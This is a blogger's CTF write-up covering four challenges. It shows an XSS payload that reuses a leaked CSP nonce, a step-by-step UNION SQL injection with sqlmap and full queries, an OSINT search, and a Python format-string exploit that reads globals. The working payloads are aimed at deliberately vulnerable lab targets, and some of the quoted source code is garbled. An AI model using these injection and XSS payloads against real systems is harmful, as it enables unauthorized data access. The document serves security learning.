- home 18.0k
- device(s) 1.0k
- stock(s) 2.3k
- server 0.1k
- cash 0.6k
- debt 4.0k
- loan 0.0k
My Net: 18.0k
Expired by:
00000 00:00:00

Break the syntax

It’s has been a while since I played CTF games. Anyway, I share my struggles as an amateur player.

1. Web challenge - Never gonna give you flag

Landing page

This landing page contained 6 links where 2 of them contained below interesting codes.

<head><script src="jquery-3.5.1.min.js"></script></head>
  <div> Rick never gonna: </div>
  <p id="rick-says">
  <img src="images/rick6.jpg">

  <script nonce="JIYr435smMmKG1nAAFNlrKUewAEaTWt1">
    var arg = decodeURIComponent('=')[1]);
    if (arg !== "undefined") {

<head><script src="jquery-3.5.1.min.js"></script></head>
  <img src="images/rick2.jpg" nonce="JIYr435smMmKG1nAAFNlrKUewAEaTWt1">

  <script nonce="JIYr435smMmKG1nAAFNlrKUewAEaTWt1">
      url: "flag.php",
      headers: {
        "Nonce": "JIYr435smMmKG1nAAFNlrKUewAEaTWt1"
      success: function (result) {


The first page exposed XSS vulnerability and the second one hinted toward the flag. My first task was to successfully get XSS! message in the developer console.


This attempt threw a Content Security Policy error in the developer console. So fixed it with my second try.

./Never_gonna_say_goodbye.html?search=<script nonce="JIYr435smMmKG1nAAFNlrKUewAEaTWt1">console.log("XSS!")</script>

The previous error was gone but the arg variable held only <script nonce part from my payload. So replaced = sign with %3D to get around the split.

./Never_gonna_say_goodbye.html?search=<script nonce%3D"JIYr435smMmKG1nAAFNlrKUewAEaTWt1">console.log("XSS!")</script>

Finally, the “XSS!” message arrived in the dev console. Good to go for the flag.

./Never_gonna_say_goodbye.html?search=<script nonce%3D"JIYr435smMmKG1nAAFNlrKUewAEaTWt1">$.ajax({ url: "flag.php", headers: { "Nonce": "JIYr435smMmKG1nAAFNlrKUewAEaTWt1" }, success: function (r) { console.log(r); } });</script>

The flag received in the dev console: BtS-CTF{r1cK_g4v3_uP_y0ure_h3lpl3ss}.

2. Web challenge - Cheated lottery

Landing page The landing page source hinted at the /?source=1 endpoint that contained the server-side code.

from flask import Flask, render_template, request 
from dotenv import load_dotenv 
import mysql.connector 
import os 
def get_coupons(form):
  coupons = list()
  mydb = mysql.connector.connect( host=os.getenv('mysql_host'), user=os.getenv('mysql_user'), password=os.getenv('mysql_pwd'), database=os.getenv('mysql_db') ) mycursor = mydb.cursor()
    mycursor.execute("SELECT * FROM coupons WHERE code = '" + str(form['cid']) + "'")
      myresult = mycursor.fetchall()
      for x in myresult:
        coupons.append({ 'code': x[1], 'value': x[2] })
        return coupons

app = Flask(__name__)
@app.route('/', methods=['POST', 'GET'])
def index(source=None):
  if request.method == "POST":
    coupons = get_coupons(request.form)
    if coupons == []:
      return render_template('list.html', error="Sorry, you didn't win")
      return render_template('list.html', coupons=coupons)
    if request.args.get('source') == '1':
      with open(__file__, 'r') as r:
      return render_template('base.html')

if __name__ == "__main__":"", port=7331)

The code section to query MySQL database is intentionally left exposed to SQL Injections.

sqlmap -r ./request.txt -p cid

The SQLmap tool reported that UNION attack with 3 columns is the way to go. My first injection was for acquiring the database name: test' UNION SELECT DATABASE(), DATABASE(), DATABASE() WHERE 'x' = 'x
The actual executed query becomes:


Received the database name as ff86e476b1344851f095759d1eeccda72d9363ad. The second injection was to list all tables in this database: test' UNION SELECT NULL, table_name, table_type FROM information_schema.tables WHERE 'x' = 'x
The correctly executed query becomes:

SELECT * FROM coupons WHERE code = 'test' UNION SELECT NULL, table_name, table_type FROM information_schema.tables WHERE 'x' = 'x'

Revealed table names were c2VjcmV0LWRi and coupons. The third injection was to get column names of the c2VjcmV0LWRi table: test' UNION SELECT NULL, column_name, column_name FROM information_schema.columns WHERE table_schema = 'ff86e476b1344851f095759d1eeccda72d9363ad' AND table_name = 'c2VjcmV0LWRi
The correctly executed query becomes:

SELECT * FROM coupons WHERE code = 'test' UNION SELECT NULL, column_name, column_name FROM information_schema.columns WHERE table_schema  = 'ff86e476b1344851f095759d1eeccda72d9363ad' AND table_name = 'c2VjcmV0LWRi'

Revealed only one column named ZGVmaW5pdGVseS1ub3QtZmxhZw. The fourth injection explored the data of the c2VjcmV0LWRi table: test' UNION SELECT NULL, ZGVmaW5pdGVseS1ub3QtZmxhZw, ZGVmaW5pdGVseS1ub3QtZmxhZw FROM c2VjcmV0LWRi WHERE 'x' = 'x
The correctly executed query becomes:

SELECT * FROM coupons WHERE code = 'test' UNION SELECT NULL, ZGVmaW5pdGVseS1ub3QtZmxhZw, ZGVmaW5pdGVseS1ub3QtZmxhZw FROM c2VjcmV0LWRi WHERE 'x' = 'x'

The flag BtS-CTF{7h475_h0w_y0u_ch347_1n_94m35} was only thing in table c2VjcmV0LWRi.

3. OSINT challenge - Lost Photos

God! All my photos from Moscow are gone, Hard disk had some problems, Usually it happens to my friends, Not to me, Thomas Garminas will be so upset. PS.: When you find what you are looking for, just put it between curly brackets and win this challenge

Google Thomas Garminas Thomas Garminas - Youtube channel Submitting BtS-CTF{02.12.2017} failed. I was afraid that the flag might be in this silent video.

Google Thomas Garminas - Firefox Google concert 02.12.2017 - Firefox By luck, Firefox saved the day. Chrome was not showing the hint. BtS-CTF{Amaranthe} - accepted.

4. Misc challenge - Simple game calculator

A simple python game source code was exposed via the debug option.

import os, sys

class Multiplayer(object):
    def __init__(self, name, difficulty, players): = name
        self.difficulty = "easy" # No one will create hard game, no need to implement it
        self.players = players

    def show_details(self):
        print('{0.players} can play this easy game called' +

class CTFGame(object):
    def __init__(self):
        self.flag = "asd"

games = {
    'multi': list()

def user_choice():
    menu = """
    Welcome to Simple Game Creator where you can create your game of choice!

    1. View all games
    2. Create your own multiplayer game

    sys.stdout.write("Choose wisely >> ")
    return sys.stdin.readline()

def add_multi():
    sys.stdout.write("Name your own multiplayer game >> ")
    name = sys.stdin.readline().strip()
    sys.stdout.write("What difficulty will it have (hard, easy)? >> ")
    diff = sys.stdin.readline().strip()
    sys.stdout.write("How many players can play this? >> ")
    players = sys.stdin.readline().strip()

    games['multi'].append(Multiplayer(name, diff, players))

    print("You created your own multiplayer game")

def show_games():
    print("\nYour games: ")
    print("\nMultiplayers: ")
    for multi in games['multi']:

def main():
    banner = """Banner"""

    while True:
        choice = user_choice().strip()
        choices = {
            '1': show_games,
            '2': add_multi
        ans = choices.get(choice, None)
        if not ans:
            print("There is no such option mate")

if __name__ == "__main__":

Several years ago, I read an article about the format string vulnerability in C code. Until today, I never imagined the concept can be applied to python as well. The only thing fishy in the code was the print statement with formatting. Google: “format string vulnerability python” yielded this GeeksForGeeks article. I was able to manage to come up with {0.__init__.__globals__} to read the flag in the game. Anyway, these were all the challenges that I successfully solved during the live event. Event ended about an hour ago, organizers have already published everything to this git repository.

Thanks to those who organized and sponsored the event. It was a really fun experience for me after all.

· CTF, XSS, format string, SQL injection